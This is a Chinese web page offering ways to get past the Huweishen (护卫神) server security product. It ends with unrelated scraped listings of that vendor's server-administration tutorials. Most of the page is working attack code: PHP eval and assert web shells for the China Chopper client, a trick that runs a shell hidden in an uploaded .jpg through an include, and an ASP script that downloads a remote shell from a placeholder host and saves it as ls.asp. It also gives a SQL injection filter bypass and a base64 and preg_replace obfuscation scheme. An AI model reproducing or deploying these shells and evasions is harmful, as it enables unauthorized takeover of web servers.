过护卫神的一些方法

一、马儿篇，都是以前可以过护卫神的马

二、注入篇，可以绕过注入的方法

三、规则篇，根据护卫神的过滤规则大家可以自己设计马儿

一、马儿篇

----------------1号--------------------------

<?php

@eval

($_POST[‘1‘]);?>

----------------2号--------------------------

<title>login</title>nono<?php

eval

($_POST

[1])

--------------------3号---------------------------------------------

<?php $a = str_replace(x,"","axsxxsxexrxxt");

$a($_POST["c"]); ?>

菜刀直接连，不需要构造连接字符串，密码 c

--------------------类似于过安全狗的包含方法-------------------------------------------

A.asp版本：

将一句话保存为 XX.jpg 上传后
地址为 .../xxxxxx.jpg

在上传一个 x.asp 内容为
<!–#include file="../xxxxxx.jpg"-->

B.php版本

如果是php的话：

<?php

include "1.htm";

------------------实在不行，还可以下载---------------------------------------------

远程下载马

Set xPost = CreateObject("Microsoft.XMLHTTP")

xPost.Open "GET","http://www.xxx.com/123/1.txt",False

xPost.Send()

Set sGet = CreateObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath("ls.asp"),2

set sGet = nothing

set sPOST = nothing

---------------------------------------------------------------

二、注入篇

/*%00*/截断符

select/*%00*/* from admin;

---------------------------------------------------------------

三、规则篇

可以利用类似：

<?php

$code=‘一串base64‘; //base64编码

$x=str_replace(‘f‘,"","bfafsfef6f4f_ffdffeffcffoffdffef");
//字符串替换

$a = ‘/a/‘;//正则规则

preg_replace($a,‘e‘.‘v‘.‘a‘.‘l‘.‘(‘.$x.‘(‘.$code.‘))‘,‘a‘); //正则替换

方法绕过关键词过滤

时间： 2024-11-06 20:36:32

过护卫神的一些方法的相关文章

[Windows Server 2012] 安装护卫神·主机管理系统

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:安装护卫神·主机管理系统·护卫神·主机管理系统是一款免费的主机管理软件,采用B/S工作模式,在网页上开通主机/MySQL/SQL Server,并自动配置好安全设置.·同时还带了用户控制面板,每个主机都可以通过网页前端进行管理.·本节基于Windows Server 2012系统安装,在其他Windows系统上的

护卫神·主机大师

欢迎使用"护卫神·主机大师" 该系统由四川万象更新网络通信有限公司开发,网站地址: http://www.huweishen.com 电话:028-65886111 [软件性质]自主开发,完全免费.[运行环境]Win2008/Win2008r2/Win2012/Win2016(/IIS7.0/IIS7.5/IIS8.5/IIS10.0) [模块版本]MySQL版本:5.5.19(32位)或5.6.14(64位)PHP版本为:5.2.17.5.3.29.5.4.45.5.5.37.5.6

[Windows Server 2008] IP安全策略限制端口方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com ★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频. ★ 本节我们将带领大家:限制1433端口的安全策略相比于Windows自带的防火墙,采用安全策略限制端口有更灵活的限制规则. 本节将演示只允许特定的远程服务器访问本机的1433端口(SQL Server服务). 操作思路:禁止所有用户访问1433端口,只允许个别IP访问.(安全策略里面允许的优先级大于禁止) 1.添加“IP筛选”

[Windows Server 2012] WordPress安全设置方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com ★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频. ★ 本节我们将带领大家:WordPress安全设置. 本节主要讲WordPress如何防止黑客上传木马并对网站挂马,至于WordPress的安装则不在本节讲述范围! 本节的WordPress系统已经安装,网址为:http://localhost/,网站安装目录为: D:\wwwroot\WordPress\web 需要注意的是:

[Windows Server 2012] 安装PHP+MySQL方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:PHP+MySQL安装及建站方法·IIS默认不支持PHP功能,需要单独安装应用才可以使用.·为了简化用户安装PHP,本节将使用由护卫神开发的PHP套件,该套件自动配置php和mysql,以及做好安全设置. 1.准备工作·检查是否安装IIS,如果没有安装请参考我站“IIS安装方法”的视频. ·到http://www

[Windows Server 2012] MySQL移机方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com ★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频. ★ 本节我们将带领大家:MySQL数据库移机方法本节主要讲述MySQL整体迁移方法:如果是单个数据库迁移,请查看我站其他视频. 操作流程:先在老服务器上备份[data]目录,然后在新服务器恢复[data]目录,并设置好权限 . 1.老服务器.备份数据停止MySQL数据库服务,备份[data]目录,并传输到新服务器. 2.新服务器

[Windows Server 2003] IIS自带FTP安装及配置方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:IIS6.0自带FTP安装及配置方法·IIS自带的FTP服务是最安全的,不会像Serv-U那样存在各种漏洞:但其配置过程也比较复杂.·本节将以虚拟目录方式,实现多个FTP帐户,并且每个帐户都相互隔离. 1.安装FTP服务 ·检查IIS是否已安装FTP服务,如果没有,先到http://soft.huweishen.

[Windows Server 2003] ASP.net安装方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:安装ASP.net2.0或4.0. ·Windows Serve 2003要运行使用ASP.net开发的网站或软件,必须安装对应版本的.NET Framework框架. 在桌面上有一个使用asp.net2.0开发的软件双击时无法运行,提示需要先安装.NET Framework框架.访问该服务器上的ASP.net网

[Windows Server 2008] MySQL单数据库迁移方法

★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com ★ 护卫神·V课堂是护卫神旗下专业提供服务器教学视频的网站,每周更新视频. ★ 本节我们将带领大家:MySQL数据库迁移方法注意:此方法只适用于MyISAM模式的数据库(如护卫神·PHP套件):InnoDB不适合本方法. 本节主要讲述单个数据库迁移:如果是MySQL整体迁移,请查看我站其他视频. 操作流程:先在旧服务器上备份数据库,然后在新服务器创建数据库,再恢复数据. 1.查找数据库路径打开[服